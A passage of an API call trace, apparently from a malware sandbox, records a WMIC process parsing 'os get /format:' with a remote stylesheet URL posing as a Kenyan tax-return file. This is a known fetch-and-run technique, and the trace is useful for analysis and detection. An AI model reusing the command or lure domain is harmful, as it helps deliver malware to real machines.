	[0111.088] IWbemClassObject:Get (in: This=0x2ad206535c0, wszName="Connection", lFlags=0, pVal=0xd7edd8f748*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f748*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20676a40, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.088] IUnknown:QueryInterface (in: This=0x2ad20676a40, riid=0x7ff66e6c34f8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd7edd8f738 | out: ppvObject=0xd7edd8f738*=0x2ad20676a40) returned 0x0
	[0111.088] GetCurrentThreadId () returned 0x6bc
	[0111.088] ??0CHString@@QEAA@XZ () returned 0xd7edd8f648
	[0111.088] IWbemClassObject:Get (in: This=0x2ad20676a40, wszName="Namespace", lFlags=0, pVal=0xd7edd8f658*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f658*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.088] lstrlenW (lpString="ROOT\\CIMV2") returned 10
	[0111.088] lstrlenW (lpString="ROOT\\CIMV2") returned 10
	[0111.088] IWbemClassObject:Get (in: This=0x2ad20676a40, wszName="Locale", lFlags=0, pVal=0xd7edd8f658*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206505a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f658*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.088] lstrlenW (lpString="ms_409") returned 6
	[0111.088] lstrlenW (lpString="ms_409") returned 6
	[0111.088] IWbemClassObject:Get (in: This=0x2ad20676a40, wszName="User", lFlags=0, pVal=0xd7edd8f658*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206505a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f658*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.089] IWbemClassObject:Get (in: This=0x2ad20676a40, wszName="Password", lFlags=0, pVal=0xd7edd8f658*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f658*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.089] IWbemClassObject:Get (in: This=0x2ad20676a40, wszName="Server", lFlags=0, pVal=0xd7edd8f658*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f658*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.089] lstrlenW (lpString=".") returned 1
	[0111.089] lstrlenW (lpString=".") returned 1
	[0111.089] IWbemClassObject:Get (in: This=0x2ad20676a40, wszName="Authority", lFlags=0, pVal=0xd7edd8f658*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206505a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f658*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.089] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.089] IUnknown:Release (This=0x2ad20676a40) returned 0x1
	[0111.089] GetCurrentThreadId () returned 0x6bc
	[0111.089] ??0CHString@@QEAA@XZ () returned 0xd7edd8f648
	[0111.089] IWbemClassObject:Get (in: This=0x2ad206535c0, wszName="__RELPATH", lFlags=0, pVal=0xd7edd8f670*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f670*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"OS\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.089] GetCurrentThreadId () returned 0x6bc
	[0111.089] ??0CHString@@QEAA@XZ () returned 0xd7edd8f510
	[0111.089] ??0CHString@@QEAA@PEBG@Z () returned 0xd7edd8f530
	[0111.089] ??0CHString@@QEAA@AEBV0@@Z () returned 0xd7edd8f4a8
	[0111.089] ?Empty@CHString@@QEAAXXZ () returned 0x7ffbfe19627c
	[0111.089] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2ad2087bc40
	[0111.089] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b
	[0111.089] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xd7edd8f4b8
	[0111.089] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xd7edd8f4b0
	[0111.089] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xd7edd8f530
	[0111.089] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.089] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.090] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xd7edd8f480
	[0111.090] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xd7edd8f4a8
	[0111.090] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.090] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2ad2087b6d0
	[0111.090] ?Find@CHString@@QEBAHPEBG@Z () returned 0x2
	[0111.090] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xd7edd8f4b8
	[0111.090] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xd7edd8f4b0
	[0111.090] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xd7edd8f530
	[0111.090] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.090] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.090] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xd7edd8f480
	[0111.090] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xd7edd8f4a8
	[0111.090] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.090] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7ffbfe196270
	[0111.090] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.090] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
	[0111.090] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
	[0111.090] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
	[0111.090] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x21
	[0111.090] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x74
	[0111.090] SysStringLen (param_1="\"") returned 0x1
	[0111.090] IWbemServices:GetObject (in: This=0x2ad20654bc0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xd7edd8f500*=0x0, ppCallResult=0x0 | out: ppObject=0xd7edd8f500*=0x2ad20676a40, ppCallResult=0x0) returned 0x0
	[0111.092] IWbemClassObject:Get (in: This=0x2ad20676a40, wszName="Text", lFlags=0, pVal=0xd7edd8f540*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f540*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b700*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad20632ea0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.093] SafeArrayGetLBound (in: psa=0x2ad2064b700, nDim=0x1, plLbound=0xd7edd8f518 | out: plLbound=0xd7edd8f518) returned 0x0
	[0111.093] SafeArrayGetUBound (in: psa=0x2ad2064b700, nDim=0x1, plUbound=0xd7edd8f51c | out: plUbound=0xd7edd8f51c) returned 0x0
	[0111.093] SafeArrayGetElement (in: psa=0x2ad2064b700, rgIndices=0xd7edd8f508, pv=0xd7edd8f520 | out: pv=0xd7edd8f520) returned 0x0
	[0111.093] SysStringLen (param_1="Installed Operating System/s management. ") returned 0x29
	[0111.093] IUnknown:Release (This=0x2ad20676a40) returned 0x0
	[0111.093] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.093] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.093] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.093] lstrlenW (lpString="Installed Operating System/s management. ") returned 41
	[0111.093] lstrlenW (lpString="Installed Operating System/s management. ") returned 41
	[0111.093] IUnknown:Release (This=0x2ad206535c0) returned 0x0
	[0111.093] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.093] lstrlenW (lpString="PATH") returned 4
	[0111.093] lstrlenW (lpString="get") returned 3
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="PATH", cchCount2=4) returned 1
	[0111.094] lstrlenW (lpString="WHERE") returned 5
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="WHERE", cchCount2=5) returned 1
	[0111.094] lstrlenW (lpString="(") returned 1
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="(", cchCount2=1) returned 3
	[0111.094] lstrlenW (lpString="/") returned 1
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
	[0111.094] lstrlenW (lpString="-") returned 1
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
	[0111.094] lstrlenW (lpString="GET") returned 3
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0111.094] lstrlenW (lpString="/") returned 1
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
	[0111.094] lstrlenW (lpString="-") returned 1
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] lstrlenW (lpString="GET") returned 3
	[0111.094] lstrlenW (lpString="get") returned 3
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0111.094] lstrlenW (lpString="/") returned 1
	[0111.094] lstrlenW (lpString="/") returned 1
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
	[0111.094] lstrlenW (lpString="/") returned 1
	[0111.094] lstrlenW (lpString="/") returned 1
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
	[0111.094] lstrlenW (lpString="?") returned 1
	[0111.094] lstrlenW (lpString="format") returned 6
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="?", cchCount2=1) returned 3
	[0111.094] lstrlenW (lpString="VALUE") returned 5
	[0111.094] lstrlenW (lpString="format") returned 6
	[0111.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="VALUE", cchCount2=5) returned 1
	[0111.094] lstrlenW (lpString="ALL") returned 3
	[0111.095] lstrlenW (lpString="format") returned 6
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ALL", cchCount2=3) returned 3
	[0111.095] lstrlenW (lpString="FORMAT") returned 6
	[0111.095] lstrlenW (lpString="format") returned 6
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2
	[0111.095] lstrlenW (lpString="/") returned 1
	[0111.095] lstrlenW (lpString=":") returned 1
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="/", cchCount2=1) returned 3
	[0111.095] lstrlenW (lpString="-") returned 1
	[0111.095] lstrlenW (lpString=":") returned 1
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2="-", cchCount2=1) returned 3
	[0111.095] lstrlenW (lpString=":") returned 1
	[0111.095] lstrlenW (lpString=":") returned 1
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=":", cchCount1=1, lpString2=":", cchCount2=1) returned 2
	[0111.095] lstrlenW (lpString="/") returned 1
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="https://itaxkenya.com/kra/tax_returns.xsl", cchCount1=41, lpString2="/", cchCount2=1) returned 3
	[0111.095] lstrlenW (lpString="-") returned 1
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="https://itaxkenya.com/kra/tax_returns.xsl", cchCount1=41, lpString2="-", cchCount2=1) returned 3
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] lstrlenW (lpString="CSV") returned 3
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] lstrlenW (lpString="HFORM") returned 5
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] lstrlenW (lpString="HTABLE") returned 6
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] lstrlenW (lpString="LIST") returned 4
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] lstrlenW (lpString="MOF") returned 3
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] lstrlenW (lpString="RAWXML") returned 6
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] lstrlenW (lpString="TABLE") returned 5
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] lstrlenW (lpString="VALUE") returned 5
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="VALUE", cchCount1=5, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.095] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.095] lstrlenW (lpString="XML") returned 3
	[0111.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XML", cchCount1=3, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="htable-sortby") returned 13
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby", cchCount1=13, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="htable-sortby.xsl") returned 17
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby.xsl", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="texttablewsys") returned 13
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys", cchCount1=13, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="texttablewsys.xsl") returned 17
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys.xsl", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="wmiclimofformat") returned 15
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat", cchCount1=15, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="wmiclimofformat.xsl") returned 19
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat.xsl", cchCount1=19, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="wmiclitableformat") returned 17
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="wmiclitableformat.xsl") returned 21
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat.xsl", cchCount1=21, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="wmiclitableformatnosys") returned 22
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys", cchCount1=22, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="wmiclitableformatnosys.xsl") returned 26
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys.xsl", cchCount1=26, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="wmiclivalueformat") returned 17
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41
	[0111.096] lstrlenW (lpString="wmiclivalueformat.xsl") returned 21
	[0111.096] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat.xsl", cchCount1=21, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3
	[0111.096] ??0CHString@@QEAA@PEBG@Z () returned 0xd7edd8f4f8
	[0111.096] ?Right@CHString@@QEBA?AV1@H@Z () returned 0xd7edd8f4f0
	[0111.096] ??0CHString@@QEAA@PEBG@Z () returned 0xd7edd8f548
	[0111.096] _wcsicmp (_String1=".xsl", _String2=".xsl") returned 0
	[0111.096] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.096] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.096] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.096] GetCurrentThreadId () returned 0x6bc
	[0111.097] ??0CHString@@QEAA@XZ () returned 0xd7edd8f3f8
	[0111.097] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
	[0111.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bdbc0, cbMultiByte=-1, lpWideCharStr=0x2ad2087bcf0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
	[0111.097] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
	[0111.097] SysStringLen (param_1="os") returned 0x2
	[0111.097] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e
	[0111.097] SysStringLen (param_1="'") returned 0x1
	[0111.097] IWbemServices:GetObject (in: This=0x2ad20637fc0, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0xd7edd8f438*=0x0, ppCallResult=0x0 | out: ppObject=0xd7edd8f438*=0x2ad206535c0, ppCallResult=0x0) returned 0x0
	[0111.104] IWbemClassObject:Get (in: This=0x2ad206535c0, wszName="Formats", lFlags=0, pVal=0xd7edd8f4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4c0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b0c0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad2064b4b0, rgsabound=((cElements=0x7, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.105] lstrlenW (lpString="SET") returned 3
	[0111.105] lstrlenW (lpString="get") returned 3
	[0111.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
	[0111.105] SafeArrayGetLBound (in: psa=0x2ad2064b0c0, nDim=0x1, plLbound=0xd7edd8f460 | out: plLbound=0xd7edd8f460) returned 0x0
	[0111.105] SafeArrayGetUBound (in: psa=0x2ad2064b0c0, nDim=0x1, plUbound=0xd7edd8f478 | out: plUbound=0xd7edd8f478) returned 0x0
	[0111.105] SafeArrayGetElement (in: psa=0x2ad2064b0c0, rgIndices=0xd7edd8f448, pv=0xd7edd8f418 | out: pv=0xd7edd8f418) returned 0x0
	[0111.105] IWbemClassObject:Get (in: This=0x2ad20653870, wszName="Name", lFlags=0, pVal=0xd7edd8f498*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f498*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STATUS", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.105] lstrlenW (lpString="FULL") returned 4
	[0111.105] lstrlenW (lpString="STATUS") returned 6
	[0111.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STATUS", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3
	[0111.105] IUnknown:Release (This=0x2ad20653870) returned 0x1
	[0111.105] SafeArrayGetElement (in: psa=0x2ad2064b0c0, rgIndices=0xd7edd8f448, pv=0xd7edd8f418 | out: pv=0xd7edd8f418) returned 0x0
	[0111.105] IWbemClassObject:Get (in: This=0x2ad20679ee0, wszName="Name", lFlags=0, pVal=0xd7edd8f498*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206504b8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f498*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FREE", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.105] lstrlenW (lpString="FULL") returned 4
	[0111.105] lstrlenW (lpString="FREE") returned 4
	[0111.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FREE", cchCount1=4, lpString2="FULL", cchCount2=4) returned 1
	[0111.105] IUnknown:Release (This=0x2ad20679ee0) returned 0x1
	[0111.105] SafeArrayGetElement (in: psa=0x2ad2064b0c0, rgIndices=0xd7edd8f448, pv=0xd7edd8f418 | out: pv=0xd7edd8f418) returned 0x0
	[0111.105] IWbemClassObject:Get (in: This=0x2ad20686930, wszName="Name", lFlags=0, pVal=0xd7edd8f498*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206504b8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f498*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FULL", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.105] lstrlenW (lpString="FULL") returned 4
	[0111.106] lstrlenW (lpString="FULL") returned 4
	[0111.106] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FULL", cchCount1=4, lpString2="FULL", cchCount2=4) returned 2
	[0111.106] IWbemClassObject:Get (in: This=0x2ad20686930, wszName="Properties", lFlags=0, pVal=0xd7edd8f4d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4d8*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064ab80*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad20653b20, rgsabound=((cElements=0x33, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.108] SafeArrayGetLBound (in: psa=0x2ad2064ab80, nDim=0x1, plLbound=0xd7edd8f480 | out: plLbound=0xd7edd8f480) returned 0x0
	[0111.108] SafeArrayGetUBound (in: psa=0x2ad2064ab80, nDim=0x1, plUbound=0xd7edd8f488 | out: plUbound=0xd7edd8f488) returned 0x0
	[0111.109] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
